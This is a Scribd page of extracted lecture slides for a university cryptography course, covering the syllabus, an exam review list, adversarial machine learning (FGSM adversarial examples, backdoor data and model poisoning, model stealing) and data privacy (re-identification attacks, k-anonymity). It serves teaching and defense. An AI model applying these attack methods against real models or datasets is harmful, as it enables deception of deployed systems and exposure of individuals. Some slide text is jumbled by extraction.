0% found this document useful (0 votes)

8 views

Cis4520 All Lecture Notes and Assignments

CIS 4520 is an undergraduate course on Cryptography taught by Dr. Wenjing Zhang at the University of Guelph, covering fundamental concepts in information security, cryptography techniques, and their applications. The course includes a project, assignments, and a final exam, with a focus on academic integrity and collaboration among students. Key topics include symmetric and public key cryptography, authentication, and network security, with a tentative schedule outlining various subjects to be covered throughout the semester.

Uploaded by

daralash417

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

8 views

Cis4520 All Lecture Notes and Assignments

Uploaded by

daralash417

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 919

Introduction to Cryptography

CIS 4520
Course Introduction

Instructor: Dr. Wenjing Zhang

[email protected]
School of Computer Science
University of Guelph
Welcome

Welcome to CIS 4520 Introduction to Cryptography

Course introduction
People
Schedule and Topics
Tasks and grading

2
Why CIS 4520?

A. Security is one of the most popular areas in CS

B. Broader impacts…
C. Covers a broad spectrum of topics
D. Looks good on your resume

E. I will hack the computers/websites of my friends

No you won’t!

3
Why CIS 4520?

This course is for

Undergraduate CS/EE students
Students who want to learn the basics of information security

4
Who’s who?
Education & Research Experience
Research Interest: Intersection of Cybersecurity and Machine Learning
• Instructor: Dr. Wenjing Zhang (she/her/hers)

• Doctor of Philosophy (Ph.D.) in Computer Science, Dec. 2023

School of Computer Science
University of Guelph, Canada
Advisor: Dr. Xiaodong Lin, Professor, IEEE Fellow

• Visiting Research Scholar, Oct. 2016 – Oct. 2018

Department of Electrical & Computer Engineering
University of Arizona, USA
Advisors:
Dr. Ming Li: Associate Professor, IEEE Fellow, NSF CAREER Award
Dr. Ravi Tandon: Associate Professor, NSF CAREER Award

• Research Interest: Intersection of Cybersecurity and AI

5
Scholarly Trajectory

20 20 20 20
19 20 22 23

• IEEE • Computers • IEEE Transactions • NeurIPS

Transactions on & Security on Information
Information Forensics and • IEEE Transactions on
Forensics and Security (TIFS) Dependable and
Security (TIFS) Secure Computing
• IEEE Transactions (TDSC)
on
Communications • Computers &
Security

My past research has been published in Top Conferences and Journals in the field of
AI, Machine Learning, and Cybersecurity, including NeurIPS 2023, IEEE TIFS, TDSC.

6
Who’s who?

GTA

Vaideeshwaran Saravanan (Eashwar)

Master’s student, School of Computer Science

University of Guelph

E-mail: [email protected]

7
Time and location
Class: T/Th 5:30 PM – 6:50 PM
In Person, Guelph, Rozanski Hall 105

Instructor Office Hours:

Time: Thursdays 10:30 AM – 11:30 AM
Location: Guelph, J.D. MacLachlan Room 211

GTA Office Hours:

Time: Tuesdays 3:00 PM – 4:00 PM
Location: Guelph, Reynolds Building Room 0003

8
Course materials: required textbook

Cryptography and Network Security: Principles and Practice. 2017. (7th

Ed.) William Stallings. Pearson Education. (ISBN 10:1-292-15858-1.)

Lecture notes (pdf) will be posted on CourseLink.

ASSIGNMENTS and FINAL EXAM will be based on the lecture notes and
supplemental reading materials.

PROJECT will be based on the combination of research, implementation,

and experimentation.

9
Course materials: recommended textbooks

Several textbooks that might be helpful are listed below:

Cryptography: Theory and Practice, Douglas Stinson, 3rd Edition, Prentice

Hall, 2005 (more suitable for graduate students).

Introduction to Modern Cryptography, J. Katz and Y. Lindell, Chapman &

Hall/CRC, 2014

Handbook of Applied Cryptography, A. Menezes, P. Van Oorschot, S.

Vanstone, CRC Press 1996, Available Online

The Joy of Cryptography, Mike Rosulek, Oregon State University, 2017,

Available Online.

10
Prerequisites

Math
Number theory
Linear algebra
Probability
Programming
Python, C, etc…
CS (Basics)
Computer networking
Database
Web

11
Schedule (tentative)

Introduction to Information Security

Classical Encryption Techniques
Measures of Security and Ideal Cryptosystems
Symmetric Key Cryptography
Public Key Cryptosystems
Message Integrity and Authentication
Key Management and Distribution
User Authentication
Network and Web Security

12
Tasks and Grading

Project: 40%

Assignment: 30% (Equally distributed over 3 assignments)

Examination: 25% (One final exam)

Class participation: 5% (Participate in in-class Tophat quiz)

13
Policies

Plagiarism and Academic Integrity!

https://guides.lib.uoguelph.ca/academicintegrity

The University of Guelph is committed to the highest standards of

academic integrity and honesty.
Students are expected to be familiar with these standards and must
abide by the applicable policies (see The Academic Misconduct
Policy in the Undergraduate Calendar).

The Academic Misconduct Policy is detailed in the Undergraduate

Calendar:
http://www.uoguelph.ca/registrar/calendars/undergraduate/current/c08
/c08-amisconduct.shtml

14
Policies

Academic Integrity

Your work will be manually graded and checked with plagiarism

detection software.

Make proper citations!!

Rule of thumb: make it clear (to the grader) between your
contribution and the literature.

If you are unsure, it’s probably NOT OK!

If you are unsure, ask before you do it!

15
Policies
Discussion and collaboration
You are absolutely encouraged to discuss with your classmates
about your homework assignments and projects.
Each student should write down your own solution.
Team competition: no discussion!
You are responsible for all your works

For assignments and projects resulting from discussion,

please always acknowledge other people’s contribution
by including a sentence at the beginning of the hand-in
saying “I discussed the assignment (project) with XXX
(include more names if necessary)”. There is absolutely
NO penalty for doing so.

16
Assignment Late Policy

Assignments should be submitted through CourseLink.

Late assignments will lose 10% of the total possible for each day
they are late.

NO assignment will be accepted that is more than 2 days late.

Exceptions
Before deadline: instructor’s approval
After deadline: emergency only

17
What you will learn in this class?

Fundamentals of information security

“A little bit of everything”
Theoretical knowledge
Basic cryptography
What is public-private key cryptography?
Important concepts in security and privacy
What is man-in-the-middle attack?
What is SQL injection attack?
“Why”s behind many security designs/features
How to protect?

18
What you will not learn…

We will not cover the system administration aspects of

security
E.g. how to configure users, groups and access rights in
Windows OS.

We will not cover the management aspects of security

E.g. corporate security strategic planning, security policies,
etc.

These topics are important, but we do not have time to

cover them.

19
Project
Combine research, implementation, and experimentation with a
topic of interest.

You can work on teams of two people of your own choosing; you
may also work on your own if you wish to.

Deliverables:
Project proposal
‒ Due: Friday, January 26 2024, 11:59PM EST
Midterm report discussion
‒ Due: Tuesday, February 27 2024
Pre-recorded presentation & demonstration video
‒ Due: Friday, April 5 2024, 11:59PM EST
Final report & code
‒ Due: Friday, April 12 2024, 11:59PM EST.

20
Suggested Project Topics
You May Propose Your Own

AI security
Data Privacy
Database security
Computer systems security
Network security
Internet and web security & privacy
Cloud security
Social engineering

It is recommended to review the project resources

before starting your project.

21
Introduce Yourself

Name

Year and Major

What are you expecting to learn from the course?

22
Questions?

23
CIS 4520 Introduction to Cryptography, Winter 2024
Final Exam Preparation Guide

Instructor: Dr. Wenjing Zhang

1 Instructions

Exam Date: Thursday, April 18 2024, 8:30 AM - 10:30 AM EST (In-Person).

Location: To be announced.
Format: The format of the exam questions will be similar to Assignment 3. The exam is open book
and open notes. Laptops are allowed in airplane mode only. Connecting to a network during the exam is
strictly prohibited and constitutes a violation of academic integrity. Students are subject to the University
of Guelph’s Academic Misconduct Policy.
Note: Please write your answers in the space allocated in this printed exam. Please ensure answers are neat
and legible. Illegible answers may be given no points. After completing the exam, please use CamScanner,
an app on your phone, to scan and upload the answers to CourseLink for grading.

Total Points: 20 points.

2 Review Topics

It is important to have a deep understanding of the principles and concepts you have learned from this
course, as well as knowing how to apply them in scenarios relevant to information and network security.
The topics listed below are considered fundamental in this course, and each of them might be tested in the
final exam. Reviewing the lecture notes and assignments would be helpful.

– Introduction to Information and Network Security:

• Understand the basic goals of information and network security, such as confidentiality, integrity,
authentication, non-repudiation, availability, etc.
• What are the common threat/attack models: passive and active attacks, identify the security attacks
in terms of the violations of the security services.
– Introduction to Cryptography
• Classical cryptography and common terminology: Schematic of a secure communication over an
insecure channel.
• Basic modular arithmetic, such as modular addition, multiplication, exponentiation, Euler’s totient
theorem, Euclid’s algorithm, extended Euclidean algorithm, etc.
• Early ciphers: Shift, Substitution, Vigenere, Permutation, One-time pad, etc. Understand block and
stream ciphers.
• Cryptanalysis: Index of Coincidence.
• Three types of Cryptography: Secret key, Public key, Hash functions. What security goals are they
able to achieve, respectively? And how do they do it?
– Shannon’s Approach to Cryptography:
• Basic probability calculations.
• Perfect secrecy: equivalent definitions, and how to test whether a cryptosystem is perfectly secure.
2

• One-time pad: construction, XOR operation, and why it is perfectly secure, pros and cons.
– Symmetric Key Cryptography:
• Substitution-permutation networks: general structure and why do we need it.
• DES: The feistel structure, form of round function (S-Boxes and permutation), the key length of
DES; How to make more secure DES? – Triple DES, meet-in-the-middle attack, and how is Triple
DES designed, why?
• Five modes of encryption (how to encrypt large messages), their pros and cons, how to protect the
message integrity using message authentication codes (MACs).
– Hashes and Message Digest:
• The desired properties of cryptographic hash functions: one-way property, collision resistance, and
randomness, why are they needed?
• Understand how to construct secure keyed hash function.
• Applications of hash functions: e.g., integrity check, authentication, commitment protocols, en-
cryption, etc. How to securely combine hash with encryption to achieve both confidentiality and
authentication/integrity protection.
– Public Key Cryptography
• The basic concepts of public key cryptography, including public key encryption and signatures, what
security properties they can achieve.
• The RSA cryptosystem: know how public/private keys are generated; how to use public/private
keys to encrypt/decrypt messages; cryptanalysis of RSA; the vulnerabilities of textbook RSA.
• Digital signature schemes: security requirements, construction, possible attacks, hash and then sign.
• Applications of digital signatures – basic applications, and how to securely combine signature with
encryption to achieve both confidentiality and authentication/integrity protection.
– Key Management:
• Key pre-distribution: KDCs and CAs: why are they needed? How to do key distribution/manage-
ment with KDCs or CAs? What information is included in a ticket/certificate?
• Session key establishment, Diffie-Hellman key agreement: how does it work, why it’s secure against
eavesdroppers, why not secure against Man-in-the-Middle attacks? How to fix it?
• The public key infrastructure; certificate chains: how to find a chain of trust in a particular model.
– Authentication:
• An assessment of potential challenges you might encounter and strategies to address them.
• What information is generally used in authentication? What you are, what you have, and what you
know.
• Authentication protocol design principles: concept of one-way and mutual authentication; some
typical designs of symmetric key based and public key based authentication schemes; be familiar
with the known security handshake pitfalls: what are the common attacks? How do they work?
How to defend against them? E.g., replay attack; the role of different types of random numbers. Be
able to reason about the security of simple authentication protocols and fix vulnerabilities; design
simple authentication protocols that are secure under given adversary models and goals.
– Kerberos V4/V5::
• The function of Kerberos and the security services it provides; basic system configuration.
• The authentication mechanisms used in Kerberos Authentication – the concepts of KDC, long-term
authentication key, session key, ticket, ticket-granting ticket, authenticator, credential, etc.
– IPSec:
• Understand the motivation of IPSec – various IP level attacks such as IP spoofing.
3

• The two protocols in IPSec – AH, ESP. The security services each protocol provides.
• Two operation modes – Transport mode and Tunnel modes. The difference between the two modes
and the suitable application scenarios.
• What process is applied to the packet by AH and ESP, including considerations regarding header
structure?
– SSL/TLS:
• The security services SSL/TLS provide.
• Understand the different mechanisms, protocols used in server authentication and client authen-
tication. Understand how each security goal is achieved in SSL/TLS (e.g., authentication, key
establishment, confidentiality, integrity).
• Compare Kerberos, IPSec, and SSL, understand the different scopes of applicability and implemen-
tation locations in TCP/IP protocol stack.
– Firewalls:
• Types of firewalls: Stateless and stateful packet filtering firewall, application-level firewall.
• Firewall rules: understand and apply.
– Intrusion Detection Systems:
• Basic methods: Statistical anomaly detection, signature approaches, rule-based intrusion detection.
• The Base-rate Bayesian Fallacy.
– Software & Web Security:
• Buffer overflows, SQL injection, Cross Site Scripting (XSS): How do they work? How to avoid such
attacks when writing new apps?
• Trojan horses,viruses, worms, rootkits; understand how they work and their differences.
– Privacy
• Statistical Database Privacy: understand the concept of anonymity, common privacy breaches, clas-
sical privacy protection techniques.
• Network Anonymity: Understand onion routing and route establishment.
– Important topics in Cybersecurity but not included in the exam:
• Operating System Security
• Machine Learning Security
• Quantum Computing & Post-quantum Cryptography
CIS 4520
Introduction to
Cryptography

Wenjing Zhang
CIS 4520 Introduction to Cryptography

Introduction to
Security and Privacy
in
AI/Machine Learning

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Machine Learning (ML)
Wenjing Zhang
• A branch of artificial intelligence that learns from
data to make decisions or predictions.
• Data is cheap and abundant (data warehouses, data
marts); knowledge is expensive and scarce.
• Example in retail: Customer transactions to
consumer behavior:
– People who bought “Da Vinci Code” also bought “The
Five People You Meet in Heaven” (Amazon)
– People who bought beer also bought chips (Walmart)
– People who like photography also like travel (Google Ads)

2
CIS 4520
Introduction to
Cryptography
Different Types of ML
Wenjing Zhang Supervised Unsupervised Reinforcement
Learning Learning Learning

Objective Map inputs to Discover data Maximize cumulative

outputs patterns rewards
Training Labeled input- Unlabeled data Agent-environment
Data output pairs interaction (Agent
chooses training data)
Feedback Immediate None Delayed scalar reward
label/value
Model Neural Clustering Markov Decision
Examples networks models Processes
Application Prediction tasks Pattern Decision-making in
(classification discovery dynamic environments
and regression) (clustering, where an agent must
dimensionality perform actions to
reduction) achieve goals. (Game
AI, robotics)
CIS 4520
Introduction to Important Subfields of ML
Cryptography

Wenjing Zhang Statistical Machine Deep Learning (DL)

Learning (SML)
Approach Statistical methods for Neural networks to learn
pattern learning and data representations
prediction through layers
Algorithms Linear regression, decision CNNs, RNNs, etc.
trees, SVM, etc.
Representation Uses handcrafted features, Automatically learns
often requiring domain from raw input, without
knowledge manual features
Performance Requires manual tuning; Minimal tuning; highly
& Scalability may struggle with big data scalable for big data
Interpretability More interpretable due to Less interpretable due to
simpler models complexity
Training Data Effective with less data for Requires large datasets
simpler models for optimal performance

4
CIS 4520
Introduction to
Cryptography
Statistical Machine Learning (SML)

• Supervised Learning (Task: classification )

Wenjing Zhang

5
CIS 4520
Introduction to
Cryptography
Deep Learning (DL)

• Deep Neural Networks (DNNs)

Wenjing Zhang

6
CIS 4520
Introduction to
Cryptography
Machine Learning and Security
Wenjing Zhang

Machine Learning Adversarial Machine

for Security Learning

7
CIS 4520
Introduction to
Cryptography
Machine Learning for Security

• Using machine learning techniques for

Wenjing Zhang

– Intrusion detection system (IDS)

– Anomaly detection
– Spam filtering
– Software analysis/testing
– Virus/malware detection
– User behavioral analysis

8
CIS 4520
Introduction to
Cryptography
Adversarial Machine Learning

• Explore vulnerabilities of machine learning

Wenjing Zhang

models to perform adversarial attacks.

• These attacks aim to manipulate or deceive
the model by intentionally feeding it
misleading or crafted input data, to cause
the model to make incorrect predictions or
classifications.

9
CIS 4520
Introduction to
Cryptography
Security & Privacy in Machine Learning
Wenjing Zhang

Security & Privacy risks at each stage

within the life cycle of an ML model
Image courtesy of Sony AI
10
CIS 4520
Introduction to
Cryptography
Traffic Sign Recognition
Wenjing Zhang

Stop
Sign

𝒙 𝑓(𝒙) 𝑙𝑐 = 𝑓(𝒙)

11
CIS 4520
Introduction to
Cryptography
Security Threats in Machine Learning
Wenjing Zhang

Evasion Attacks Backdoor Exploratory

Attacks Attacks
(Adversarial
Examples) (Neural Trojans) (Model/Data
Stealing)

12
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)

• Adversarial examples in evasion attacks

Wenjing Zhang

– refer to inputs that are intentionally designed to

deceive machine learning models.
– these inputs could be subtle changes to the
image that are imperceptible to humans (i.e.,
appearing nearly identical to regular data
points) but can cause the machine learning
model to make incorrect predictions or
classifications

13
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)
Wenjing Zhang

+ Speed
Limit 60

′
𝒙′ 𝑓( ) 𝑓 𝒙 ≠ 𝑙𝑐
𝑥′ is the adversarial example that looks almost
identical to the original to human eyes but is
entirely different to the neural network.
14
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)
Wenjing Zhang

• This illustrates how sensitive machine

learning models can be to small changes
in their input data.
• Such vulnerability can be exploited to
mislead models in critical applications.
15
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)

• Recap: how do we train a deep neural

Wenjing Zhang

network?
– A loss function is defined, which could be as
simple as

𝐿 𝒙, 𝑦, 𝑤 = 𝑓 𝒙 − 𝑦

The The
The The
input network
label DNN
image weights

16
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)

• Recap: how do we train a DNN

Wenjing Zhang

– Summation of the outputs of previous layer

multiplied by the weights of previous layer:

– Activation function:

Neuron

17
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)

• Recap: how do we train a deep neural

Wenjing Zhang

network?
Learning rate – Gradient decent
𝑤 ′ = 𝑤 − 𝛼∇𝑤 𝐿(𝒙, 𝑦, 𝑤)
Gradient of Loss
with respect to w
gives us the
direction in which
we should adjust
our parameters to
reduce the loss.

Image Credit: Oscar Knagg, Know your enemy–Why adversarial examples are more important than you realize
https://towardsdatascience.com/know-your-enemy-the-fascinating-implications-of-adversarial-examples-5936bccb24af

18
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)

• Recap: how do we train a deep neural

Wenjing Zhang

network?
– Gradient decent on the sample

′
𝒙 = 𝒙 + 𝜖sign(∇𝒙 𝐿 𝒙, 𝑦, 𝑤 )

Adversarial Perturbation To increase

example budget the loss

19
CIS 4520
Introduction to
Cryptography
Evasion Attacks (Adversarial Examples)
Wenjing Zhang
• Small changes (bounded by the perturbation
budget) that are imperceptible to human eyes
could fool the deep learning models.

|| 𝒙 ′ − 𝑥||𝑝 < 𝜖
• Attack success rate of FGSM-16 could reach
80%+ on CIFAR and ImageNet datasets.

• Deep neural networks still process visual

information in a very different way than
human brains.

20
CIS 4520
Introduction to
Cryptography
Security & Privacy in Machine Learning
Wenjing Zhang

Evasion Attacks Backdoor Exploratory

Attacks Attacks
(Adversarial
Examples) (Neural Trojans) (Model/Data
Stealing)

21
CIS 4520
Introduction to
Cryptography
Backdoor Attacks (Neural Trojans)

• Embed hidden triggers into the model

Wenjing Zhang

– These triggers could be specific patterns in the

input data or certain conditions that, when met,
activate the backdoor behavior.

Speed
Limit 60

𝒙′ 𝑓′( ) 𝑓′ 𝒙′ ≠ 𝑙𝑐
22
CIS 4520
Introduction to
Cryptography
Backdoor Attacks (Neural Trojans)

• Data Poisoning Attacks

Wenjing Zhang

• Change training data

• Model Poisoning Attacks

• Change model structure

• Code Poisoning Attacks

• Change source code/library

23
CIS 4520
Introduction to
Cryptography
Backdoor Attacks (Neural Trojans)
Wenjing Zhang
• Data Poisoning Attacks
• Pollute the training data
• Add trigger patterns to benign training images
• Give adversarial labels to these images
• Inject adversarial samples into training dataset

T. Gu, K. Liu, B. Dolan-Gavitt and S. Garg, "BadNets: Evaluating Backdooring Attacks on Deep Neural
Networks," in IEEE Access, vol. 7, pp. 47230-47244, 2019, doi: 10.1109/ACCESS.2019.2909068.

24
CIS 4520
Introduction to
Cryptography
Backdoor Attacks (Neural Trojans)
Wenjing Zhang • Model Poisoning Attacks
• Inject backdoors into DNN network structure
• Inject a neural Trojan into the victim DNN
• Train it with adversarial data (freeze the rest of
the DNN)
• Share the backdoored DNN

25
CIS 4520
Introduction to
Cryptography
Security & Privacy in Machine Learning
Wenjing Zhang

Evasion Attacks Backdoor Exploratory

Attacks Attacks
(Adversarial
Examples) (Neural Trojans) (Model/Data
Stealing)

26
CIS 4520
Introduction to
Cryptography
Exploratory Attacks (Model/Data Stealing)
Wenjing Zhang

Goal: understand and extract

information rather than
directly cause harm.
Approach: replicate a ML
model, testing it with inputs
to create a similar model,
even without direct access to
the original’s internal
workings or training data.
27
CIS 4520
Introduction to
Cryptography
Security & Privacy in Machine Learning
Wenjing Zhang

Defense

28
CIS 4520
Introduction to
Cryptography
Defense: DNN Sanitization

• Robust Models
Wenjing Zhang

– Adversarial training
• DNN Sanitization/Pruning
– Fine-pruning [RAID’18]
• DNN Anomaly Detection
– NeuralCleanse [S&P’19], ABS [CCS’19]
• Input Sanitization
– Februus [ACSAC’20]
• Backdoor Trigger Detection
– STRIP [ACSAC’19]

29
CIS 4520
Introduction to
Cryptography
Security and Privacy Conference

• https://sec-deadlines.github.io/
Wenjing Zhang

• S&P (Oakland), Crypto, NDSS,

ACM CCS, USENIX Security

30
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

CIS 4520 Introduction to Cryptography

Privacy

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Tech Giants Fined for Privacy Breaches
Wenjing Zhang

2
CIS 4520
Introduction to
Cryptography
2017 Billboard Campaign by Spotify

• Spotify’s favourite: “Dear person who

Wenjing Zhang

played ‘Sorry’ 42 times on Valentine’s

Day, What did you do?”
• “Dear person in LA who listened to the
“Forever Alone” playlist for 4 hours on
Valentine’s Day, You OK?”
• “To the 1,235 guys who loved the “Girls
Night” playlist this year, We love you.”
• “Dear person in the Theater District who
listened to the Hamilton Soundtrack 5,376
times this year, Can you get us tickets?”
3
CIS 4520
Introduction to Privacy Protection: An Urgent Need
Cryptography

Wenjing Zhang

4
CIS 4520
Introduction to
Cryptography
What is Privacy?

• “Privacy” has been studied in computer

Wenjing Zhang

science for decades.

• “Privacy” is a multi-faceted issue

What is Privacy?

5
CIS 4520
Introduction to
Databases in Real-world Applications
Cryptography

Wenjing Zhang

Application Data Private Analyst Function (utility)

Collector Information
Medical Hospital Disease Epidemiologist Correlation between
disease and
geography
Genome Hospital Genome Statistician/ Correlation between
analysis Researcher genome and
disease
Advertising Google/FB Clicks/Brow Advertiser Number of clicks on
sing an ad by
age/region/gender
…
Social Facebook Friend links Another user Recommend other
Recommen- / profile users or ads to users
dations based on social
network

6
CIS 4520
Introduction to
Cryptography
Massive Real-world Data Collection
Wenjing Zhang • Settings where data collector may not be trusted
(or may not want the liability …)
Application Data Collector Private Function (utility)
Information

Location Verizon/AT&T Location Traffic prediction

Services

Recommen- Amazon/Google Purchase Recommendation

dations history model

Traffic Internet Service Browsing Traffic pattern of

Shaping Provider history groups of users

7
CIS 4520
Introduction to
Cryptography
Social Network Data
Wenjing Zhang
• Facebook currently has over 400 million users
• Each of these users specify details about
themselves
• For example:

Source: Raymond Heatherly (The University of Texas at Dallas)

8
CIS 4520
Introduction to
Cryptography
Sample Medical Dataset

• Microdata table
Wenjing Zhang

– Identifier (ID), Quasi-Identifier (QID),

Sensitive Attribute (SA)

ID QID SA
Name Zipcode Age Sex Disease
Alice 47677 29 F Ovarian Cancer
Betty 47602 22 F Ovarian Cancer
Charles 47678 27 M Prostate Cancer
David 47905 43 M Flu
Emily 47909 52 F Heart Disease
Fred 47906 47 M Heart Disease

9
CIS 4520
Introduction to
Cryptography
Location Data

• Location-aware mobile devices

Wenjing Zhang

– iPhone 15, Apple Watch Series 9,

– Google Pixel 8, Galaxy S23…
• Location-Based Services (LBSs)
• Applications:
– Public health studies, e.g., disease modeling by
the U.S. government
– Smart transportation, e.g., traffic flow analysis
– Business strategies planning, e.g., identifying
areas where to develop new businesses

10
CIS 4520
Introduction to Location Privacy Leakage
Cryptography

Wenjing Zhang Research has shown

attackers can

• Reconstruct individual
location traces within
location density

• Uniquely identify users:

‒ Home address: College home

Ave.
‒ Occupation: Student of home

University of Guelph

University of Guelph, ON

11
CIS 4520
Introduction to
Cryptography
Location Data Reveal US Military Bases
The Guardian: A US military base in Helmand Province,
Wenjing Zhang
Afghanistan with routes taken by joggers highlighted by Strava

12
CIS 4520
Introduction to
Cryptography
What is Privacy?
Wenjing Zhang • From user perspective (privacy concerns)
– Identity and identifiable information?
• My SSN
– Sensitive personal information?
• My birthdate
– Information access and information flow?
• When I post a message on Facebook, who sees the
message?
– Usage of information
• You can use my income data to approve this credit
card, but NOT to send me advertisements.

13
CIS 4520
Introduction to
Cryptography
What is Privacy?
Wenjing Zhang • From solution perspective (addressing
privacy concerns)
– Anonymity: Privacy as protecting the identity
• Data anonymity: remove identifiable information from
data
• Network anonymity: hide identity on the internet
– Private-preserving data publishing/sharing
• Identities cannot be recovered from anonymized data
• Two parties “share” information to compute a function
(e.g., the intersection of two lists), but neither party
learns the raw data.
– Privacy-preserving data mining
• You can learn aggregate data, but not individual record

14
CIS 4520
Introduction to
Cryptography
What is Privacy?

• “Privacy” has been studied in computer

Wenjing Zhang

science for decades.

• “Privacy” is a multi-faceted issue
• This lecture focuses specifically on two
aspects:
– Part 1. Statistical Database Privacy
• Remove identifiable information from data
– Part 2. Network Anonymity
• Hide identity on the internet

15
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Part 1. Statistical Database Privacy

16
CIS 4520
Introduction to
Cryptography
What is Privacy?

• Privacy as protecting the identity

Wenjing Zhang

– Statistical Database Privacy

• Remove identifiable information from data
– Network Anonymity
• Hide identity on the internet

17
CIS 4520
Introduction to
Cryptography
Data Anonymity
Wenjing Zhang • Privacy
– Large collections of data: census, survey,
social networks, public records, etc.
– Identifiable information and sensitive
attributes.
• Two opposing goals
– To allow researchers to extract knowledge
about the data
– To protect the privacy of every individual

18
CIS 4520
Introduction to
Cryptography
Data Anonymity

• First attempt: data anonymization

Wenjing Zhang

• Remove identifiable attributes from the

database
– Name
– SSN
– Address
– Email
– Phone number

19
CIS 4520
Introduction to
Cryptography
Data Anonymity

• Microdata table
Wenjing Zhang

– Identifier (ID), Quasi-Identifier (QID),

Sensitive Attribute (SA)

20
CIS 4520
Introduction to
Cryptography
Data Anonymity

• Microdata table
Wenjing Zhang

– Identifier (ID), Quasi-Identifier (QID),

Sensitive Attribute (SA)

21
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Slido

What would you do to attack this dataset?

22
CIS 4520
Introduction to
Cryptography
Data Anonymity
• Latanya Sweeney @ CMU
Wenjing Zhang
– Purchased voter’s registration data from Mass. and
compared with medical records.
– Successfully identified medical record of Mass. governor
– 87% of the U.S. Population are uniquely identified by
{date of birth, gender, ZIP}.

23
CIS 4520
Introduction to
Cryptography
The Netflix Prize (USD 1,000,000)
Wenjing Zhang
• The Netflix Prize: who has the best prediction algorithm?
– 100M ratings from 480K users on 17K movies
– Data was (not so) carefully sanitized: anonymized, modified
dates, partial data.
– Movie information (title and year) was provided
• Arvind Narayanan and Vitaly Shmatikov, Robust De-
anonymization of Large Datasets (How to Break Anonymity
of the Netflix Prize Dataset), IEEE S&P 2008.
– Can re-identify users by correlating the anonymized data with
publicly available information, particularly from the Internet
Movie Database (IMDb).
– Netflix was sued and Netflix Prize II was canceled.
• Anonymization is NOT enough!

24
CIS 4520
Introduction to
Cryptography
Individually Identifiable Information

• Removing identifiers is not enough!

Wenjing Zhang

25
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Slido

What would you do to protect this dataset?

26
CIS 4520
Introduction to
Cryptography
Classes of Solutions

• Data Obfuscation/Perturbation
Wenjing Zhang

– Nobody sees the real data

• Summarization
– Only the needed facts are exposed
• Data Separation
– Data remains with trusted parties

27
CIS 4520
Introduction to
Cryptography
Data Obfuscation/Perturbation

• Goal: Hide the protected information

Wenjing Zhang

• Approaches
– Randomly modify data (e.g., add noise)
– Swap values between records
– Controlled modification of data to hide secrets
– Constrains: preserve data utility
• should not change statistical distribution
• should not interfere legitimate use of data
• Problems
– Does it really protect the data?
– Can we learn from the results?

28
CIS 4520
Introduction to
Cryptography
Data Obfuscation/Perturbation
Wenjing Zhang
• Example: US Census Bureau Public Use of large-
scale Microdata
• US Census Bureau summarizes by census block
– Minimum 300 people; ranges rather than values
• For research, “complete” data provided for sample
populations
– Identifying information removed: limitation of detail:
geographic distinction, continuous interval; Top/bottom
coding (eliminate sparse/sensitive values)
– Swap data values among similar individuals: if
individual determined, sensitive values likely incorrect

29
CIS 4520
Introduction to
Cryptography
Data Summarization

• Goal: Make only innocuous/harmless

Wenjing Zhang

summaries of data available

• Approaches
– Overall collection statistics
– Limited query functionality
• Problems
– Can we deduce data from statistics?
– Is the information sufficient?

30
CIS 4520
Introduction to
Cryptography
Data Summarization

• Example: Statistical Queries

Wenjing Zhang

• User is allowed to query protected data

– Queries must use statistical operators (e.g.,
summation, mean value) that summarize results
• Example: Summation of total income for a group
doesn’t disclose individual income
– Multiple queries can be a problem
• Request total salary for all employees of a company
• Request the total salary for all employees but the
president
• Now we know the president’s salary

31
CIS 4520
Introduction to
Cryptography
Data Separation

• Goal: Only trusted parties see the data

Wenjing Zhang

• Approaches
– Data held by owner/creator
– Limited release to trusted third party
– Operations/analysis performed by trusted party
• Problems
– Will the trusted party be willing to do the
analysis? Could be a “bottleneck” as well
– Do the analysis results disclose private
information?

32
CIS 4520
Introduction to k-Anonymity
Cryptography

Wenjing Zhang • The larger set of indistinguishable entities, the

lower probability of identifying any one of them
– Can use to “anonymize” a selected private
attribute value within the domain of its all
possible values

33
CIS 4520
Introduction to
Cryptography
k-Anonymity & Generalization
Wenjing Zhang
• k-Anonymity
– Each record is indistinguishable from at least k-1 other
records
– These k records form an equivalent class
– k-Anonymity ensures that linking cannot be performed
with confidence > 1/k.
• Generalization
– Replace with less-specific but semantically-consistent
values
476** 2*
*

47677 47602 47678 29 22 27 Male Female

Zipcode Age Sex

34
CIS 4520
Introduction to
Cryptography
k-Anonymity & Generalization

• 3-Anonymous table
Wenjing Zhang

– Suppose that the adversary knows Alice’s QI

values (47677, 29, F).
– The adversary does not know which one of the
first 3 records corresponds to Alice’s record.
The Microdata The Generalized Table
QID SA QID SA

Zipcode Age Sex Disease Zipcode Age Sex Disease

47677 29 F Ovarian Cancer

476** 2* * Ovarian Cancer
47602 22 F Ovarian Cancer
476** 2* * Ovarian Cancer
47678 27 M Prostate Cancer 476** 2* * Prostate Cancer
47905 43 M Flu
4790* [43,52] * Flu
47909 52 F Heart Disease 4790* [43,52] * Heart Disease
4790* [43,52] * Heart Disease
47906 47 M Heart Disease

35
CIS 4520
Introduction to
Cryptography
k-Anonymity & Generalization

• This is wrong
Wenjing Zhang

– 3-anonymity on each quasi-identifier

– Uniquely identifiable on the combination

The Microdata
QID SA
Zipcode Age Sex Disease
476** 2* F Ovarian Cancer
476** 2* M Ovarian Cancer
476** 3* F Prostate Cancer
479** 3* M Flu
479** 3* F Heart Disease
479** 2* M Heart Disease

36
CIS 4520
Introduction to
Cryptography
k-Anonymity & Generalization
Wenjing Zhang • k-Anonymity does not provide privacy if:
– Sensitive values in an equivalence class lack
diversity
– The attacker has background knowledge
A 3-anonymous patient table
